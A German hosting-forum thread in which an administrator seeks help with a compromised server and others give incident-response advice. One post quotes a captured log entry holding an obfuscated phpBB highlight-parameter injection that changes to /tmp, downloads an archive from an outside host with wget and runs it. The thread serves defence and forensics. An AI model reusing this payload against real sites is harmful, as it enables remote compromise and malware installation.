Bekomm den Angreifer nicht in Griff

[bierteufel]

Hallo Leute,

ich bin bald am Ende mit meinem Latein.

Folgender Sachverhalt, der (böse) Surfer erlangt wahrscheinlich via PHP Introducion oder MySQL Introducion Schreibrechte auf /tmp/,
dann legt er darin sein scheiss script ab und startet so um dis 200 SSH Scans. Ich habe alle Logfiles durchgesehen, kann Ihn doch jedoch nicht lokalisieren über welchen Kunden Acount er drauf kommt.

System: Suse 9.0, PHP 4.3.10, Confixx 3.07

Solche niedlichen Sachen hat er auch immer noch dabei:

/tmp/.access.log/y2kupdate >/dev/null 2>&1

jetzt gerade

pscan2

[captaincrunch]

Unter welchem User laufen die unter /tmp liegenden Prozesse denn? Warum hast du /tmp nicht längst noexec gemountet? Warum läuft der Apache dann noch? Hast du schon ein Backup der Nutzdaten und der Logs angelegt?

Fragen über Fragen...

[bierteufel]

Unter welchem User laufen die unter /tmp liegenden Prozesse denn? Warum hast du /tmp nicht längst noexec gemountet? Warum läuft der Apache dann noch? Hast du schon ein Backup der Nutzdaten und der Logs angelegt?

Fragen über Fragen...

- Die Prozesses "des freundes" laufen als WWWRUN
- Daten sind gesichert
- Logs sind gesichert
- ich bekomm ihn manuell nur von der Kiste
- es muss doch möglich sein Ihn zu lokalisieren...

[captaincrunch]

ich bekomm ihn manuell nur von der Kiste

Ja, und zwar, nachdem die Kiste neu aufgesetzt ist, und du das oder die unsichere(n) Script(e) lokalisiert und ausgemerzt hast.

es muss doch möglich sein Ihn zu lokalisieren...

Klar, spätestens in den Logs deines Webservers sollten sich massig Anhaltspunkte finden...so lange derjenige nicht schlau genug war, diese Spuren wenigstens ansatzweise zu verwischen (was ich aber nicht annehme).

Zurück zum noexec auf /tmp: warum ist das immer noch nciht passiert?

[bierteufel]

noexec auf /tmp werdsch gleich machen.

Ich bin schon beim durchforsetn von scripten und logs, ich kann den Zeitraum mittlerweile auf fast 10 Minuten eingrenzen und bekomm ihn nicht gefasst.

[bierteufel]

Code: Select all

phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(98)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(103)%252echr(111)%252echr(46)%252echr(114)%252echr(111)%252echr(47)%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(46)%252echr(116)%252echr(103)%252echr(122)%252echr(59)%252echr(116)%252echr(97)%252echr(114)%252echr(32)%252echr(120)%252echr(122)%252echr(118)%252echr(102)%252echr(32)%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(46)%252echr(116)%252echr(103)%252echr(122)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(46)%252echr(107)%252echr(59)%252echr(46)%252echr(47)%252echr(98)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1" 200 23055 "-" "Mozilla/3.0 (compatible; Indy Library)"

was haltet Ihr hier davon ?
Würde auf's phpbb2 Board ja deuten....

[captaincrunch]

Siehst schwer danach aus. Um welche phpbb-Version handelt's sich denn?

[bierteufel]

Siehst schwer danach aus. Um welche phpbb-Version handelt's sich denn?

PHPBB PLUs 1.5X denke ich,
ich habe den Kunden erstmal gesperrt, und mach emich nun auf die Suche...

[Joe User]

PHPBB PLUs 1.5X denke ich,
ich habe den Kunden erstmal gesperrt, und mach emich nun auf die Suche...

Das phpBB-Plus beziehungsweise die enthaltenen Mods enthalten mehrere bekannte Sicherheitslücken, wobei der von Dir gepostete Logeintrag zeigt, dass das von Deinem Kunden verwendete phpBB-Plus seit mindestens Dezember 2004 (Stichwort: Santy) nicht upgedatet wurde...

[killerhorse]

Hallo,

In diesem Zusammenhang:

http://www.rootforum.org/forum/viewtopic.php?t=35865

Das hilft (meistens)
Ich verwende übrigens die in dem oben genannten Thread nicht uneingeschränkt empfehlenswerten Rules von gotroot:

http://www.gotroot.com/tiki-index.php?p ... ownloa%20d

Funktionieren bei mir bisher 100% zuverlässig. Nachteil: Da für jedes Programm und für jede bekannte Sicherheitslücke versucht wird eine Regel zu erstellen, sind es extrem viele Rules.

Vorteil: bisher wurde noch keine erwünschte funktion von mod_security verhindert, was bei kleiner gehaltenen Rulesets durchaus vorkommen kann.

MfG

Christian

PS: Natürlich sollte man trotzdem bekannte Sicherheitlöcher stopfen und sich nicht zusehr auf mod_security verlassen, aber es bietet doch einen guten Schutz wenn man mal was übersieht.

Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.
Siehe: http://www.debian.org/doc/manuals/secur ... h4.de.html Abschnitt 4.9.1

[captaincrunch]

Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.

Diese Information ist seit (IIRC) Kernel 2.4.13 obsolet.

[killerhorse]

Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.

Diese Information ist seit (IIRC) Kernel 2.4.13 obsolet.

Oh, wusste ich nicht, danke für den Tipp.

[captaincrunch]

Die genaue Version müsstest du mal raussuchen, hatte ich hier irgendwann mal gepostet, aber auf die Schnelle nicht wiedergefunden.

[lord_pinhead]

Beende den Apache und kopiere mal die find Binary nochmal von einer sauberen Kiste hoch. Mit find / -ctime <tage> und find / -atime <tage> kannst du dann jede File die in den letzten Tagen erstellt wurde finden. Schau ebenfalls mal in die passwd ob ein user angelegt wurde oder der www-data user einen Loginshell bekommen hat und in einer anderen Gruppe mit drinhängt. find / -user www-data ist dann recht nützlich wenn du alle files finden willst du mit dem XSS angelegt wurden (und auch deine normalen files). Ausserdem währe vielleicht noch ein lsattrib /bin | grep "ia" ne Idee Wert, solltest überall anwenden wo deine Programme liegen (/sbin /usr/(s)bin/ usw.) .

Btw.: Wenn du lustig bist, entwirrst du mal den Shellcode, vielleicht kommst du dahinter was gemacht wurde.

[outofbound]

Oder einfacher:

a) Rechner runterfahren
b) Neu initialisieren lassen
c) Geprüftes Backup einspielen
d) Lücken beseitigen
e) Wieder online gehen.

Gruss,

Out

[captaincrunch]

Wie oft kommen solche "Tips" eigentlich noch hoch? http://www.rootforum.org/faq/index.php? ... artlang=de